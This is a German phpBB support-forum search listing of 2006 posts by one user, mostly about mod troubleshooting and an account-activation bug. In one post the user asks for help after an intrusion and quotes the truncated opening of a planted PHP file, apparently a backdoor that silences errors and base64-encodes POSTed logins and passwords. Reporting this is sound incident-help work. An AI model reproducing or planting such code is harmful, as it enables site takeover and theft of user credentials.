Die Suche ergab 1091 Treffer

von blondi
Fr 15.Dez, 2006 16:35
Forum: New Projects / Aufträge
Thema: Amazon CD Tipps
Antworten: 33
Zugriffe: 4605

stimmt jetzt wo du es sagst, stimmt ich hatte ihn mal zitiert :-))
ist ja kryptisch das der beitrag einfach weck ist ...

liebe grüsse
von blondi
Do 14.Dez, 2006 15:59
Forum: Die rofl-Bude
Thema: Betreff: Softwareanfrage :-))
Antworten: 4
Zugriffe: 2451

weist ja oxpus ... nicht alle support anfragen sind immer einfach :lol:
von blondi
Do 14.Dez, 2006 10:00
Forum: Die rofl-Bude
Thema: Betreff: Softwareanfrage :-))
Antworten: 4
Zugriffe: 2451

Betreff: Softwareanfrage :-))

Hi, wollte Euch unbedingt diese Supportanfrage nicht vorenthalten. Liebe Grüße Blondi Betreff: Softwareanfrage Sehr geehrte Damen und Herren! Voriges Jahr bin ich von der Version 'Freundin 7.0' auf 'Gattin 1.0' umgestiegen. Ich habe festgestellt, dass das Programm einen unerwarteten Kind-Prozess ges...
von blondi
Do 14.Dez, 2006 09:55
Forum: New Projects / Aufträge
Thema: Amazon CD Tipps
Antworten: 33
Zugriffe: 4605

hallo amiga, hallo oxpus ...

ich habe den mod bei mir noch drinnen, wenn die files gebraucht werden kann ich die mal raus suchen ...

liebe grüsse
von blondi
Sa 07.Okt, 2006 03:12
Forum: phpBB 2 Support Board + Modifikationen
Thema: Brauche dringend HILFEEEE!!
Antworten: 38
Zugriffe: 3765

habe das gleiche problem ... ebenfalls dimension in jedem ordner wurde ein htaccess angelegt sowie 2 datein mit folgenden inhalt <?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ." &p=". base64_encode(md5...
von blondi
Di 01.Aug, 2006 14:39
Forum: phpBB 2 Support Board + Modifikationen
Thema: Kein PN-Versand bei vollem Postfach + entspr. Meld
Antworten: 16
Zugriffe: 4829

habe ich ja gemacht, aber es geht nicht ¦4

ich häng mal die datei mit ran, falls du einen moment zeit hast oxpus vielleicht siehst du mit profi augen was :D


liebe grüsse
von blondi
Di 01.Aug, 2006 14:17
Forum: phpBB 2 Support Board + Modifikationen
Thema: Kein PN-Versand bei vollem Postfach + entspr. Meld
Antworten: 16
Zugriffe: 4829

[quote="oxpus";p="61298"]Ändere if ( $total_inbox >= $board_config['max_inbox_privmsgs'] ) in if ( $total_inbox >= $board_config['max_inbox_privmsgs'] && $userdara['user_level'] != ADMIN) und Admins sollten ausgenommen sein...[/quote] halli hallo oxpus :-)) habe das snippet eingebaut, funktioniert a...
von blondi
So 16.Apr, 2006 17:31
Forum: Programmierung PHP/Ajax/CSS/HTML/Javascript
Thema: Oster Zuckerl ... Ein Schmankerl
Antworten: 2
Zugriffe: 1322

Oster Zuckerl ... Ein Schmankerl

hallo lieber oxipussi, amiga, bootenks, max und alle anderen ...

hab hier ein schönes oster zuckerl für euch :D
http://code.google.com/soc/

liebe grüsse
von blondi
Di 28.Mär, 2006 11:43
Forum: Programmierung PHP/Ajax/CSS/HTML/Javascript
Thema: Fehlerseite
Antworten: 20
Zugriffe: 5131

was genau, muss wie gemacht werden um diese funktion zu nutzen zu können...

habe mal die 404.php wie von christian beschrieben abgeändert und in den forum ordner hochgeladen, allerdings geht das bei mir nicht...

habt ihr eine kurze beschreibung


liebe grüsse
von blondi
Di 28.Mär, 2006 11:16
Forum: phpBB 2 Support Board + Modifikationen
Thema: [Suche] Userlinks automatisch editieren.
Antworten: 7
Zugriffe: 1249

such mal bei phpbb.de nach dem user mgut, der hat so einen mod gecodet ...

sollte genau das sein was du suchst ...

stichwort ebay links ...

liebe grüsse
von blondi
Sa 18.Mär, 2006 19:02
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

meia, immer habe ich die problem kinder :heul: mach ich doch ... :pp: ja ich weis ... ist echt zum ^w
von blondi
Sa 18.Mär, 2006 14:17
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

ist das vielleicht von einem gruppen mod oder so?
weil ich habe da einen eingebaut mal vor ewigkeiten, und auch einen paypal gruppen mod habe ich drinnen ...

nicht, das es von dehnen ist?

lieben gruss
von blondi
Sa 18.Mär, 2006 10:14
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

hallo oxpus,
danke dir.... werde ich gleich mal hochladen!

aber was genau hast du an den block geändert, nicht das mir dann ein anderer mod das spinnen anfängt, kennst ja mein glück :D
von blondi
Fr 17.Mär, 2006 14:43
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

ich pack mal meine aktuelle usercp_activate drann vielleicht kannst du da was finden?

danke dir oxpus
von blondi
Fr 17.Mär, 2006 14:28
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

ja richtig oxpus ...

aber wenn ich im wieder im acp aktiviere, egal ob direkt im acp userprofil oder in der liste im acp wo deative user angezeigt werden, bekomme ich den hinweis das der schlüssel nicht stimmt, und danach ist er wieder in seinem profil im acp deaktiv ...
von blondi
Fr 17.Mär, 2006 14:07
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

das schafft mich wirklich :hot: :aufreg ¢3

:maad:
von blondi
Fr 17.Mär, 2006 13:59
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

Es muss eine andere Ursache haben...

ja aber nur welche :-((
von blondi
Fr 17.Mär, 2006 12:07
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

danke für die info modbo,
aber von hand ist nicht wirklich eine hilfe, weil ich immer wieder einige user aktivieren muss, dehnen ich nur einen account auf zeit gebe ...

aber irgendwie muss da ja wo was klemmen :-(( nur wo ....
von blondi
Fr 17.Mär, 2006 11:25
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

hallo modbo, den db maintrance habe ich drinnen, auch schon mal drüber gejagt, hatte aber auch nichts gebracht :-(( wenn ein user sich ein neues PW anfordern will, kommt dieser hinweis ... Sorry, aber ein neues Passwort kann im Moment nicht gesendet werden, da dein Account derzeit noch inaktiv ist. ...
von blondi
Fr 17.Mär, 2006 10:22
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

Was passiert denn, wenn Du manuell einen User im ACP deaktivierst und dann wieder aktivierst? Kann sich dann derjenige auch nicht mehr anmelden? hallo oxpus, ich habe es eben noch mal probiert ... einen deaktivierten user via acp profil wieder aktiviert... es kam auch der hinweis, dass das userprof...
von blondi
Fr 17.Mär, 2006 01:28
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

nein an einem falsch eingegebenen paawort liegt es nicht, ich habe es eben selber noch einmal getestet ...

seltsam, irgentwas beisst sich da, nur was?
weil das deaktivieren funktioniert ja einwandfrei ...

danke für eure hilfe :-))
von blondi
Fr 17.Mär, 2006 01:10
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

nein oxpus den habe ich nicht eingebaut...
von blondi
Fr 17.Mär, 2006 01:04
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

seltsam ... aber warum tritt das bei mir auf
von blondi
Fr 17.Mär, 2006 00:51
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

[quote="oxpus - Fr 17.März, 2006 01:15";p="56082"]Denk wird Sie vermutlich meinen...[/quote] volltreffer :D genau der wars ... allerdings wenn ich den user im acp wieder aktiviere und er sich einloggen will, kommt bei ihm auch der hinweis dass, das passwort nicht mit dem in der DB übereinstimmt :-((...
von blondi
Do 16.Mär, 2006 22:56
Forum: phpBB 2 Support Board + Modifikationen
Thema: Der Aktivierungsschlüssel aus dem Link stimmt nicht mit...
Antworten: 33
Zugriffe: 4657

danke dir modbo,
dann werde ich das mal probieren ... echt blöde wenn man den mod nicht mehr weis :-))

grüsse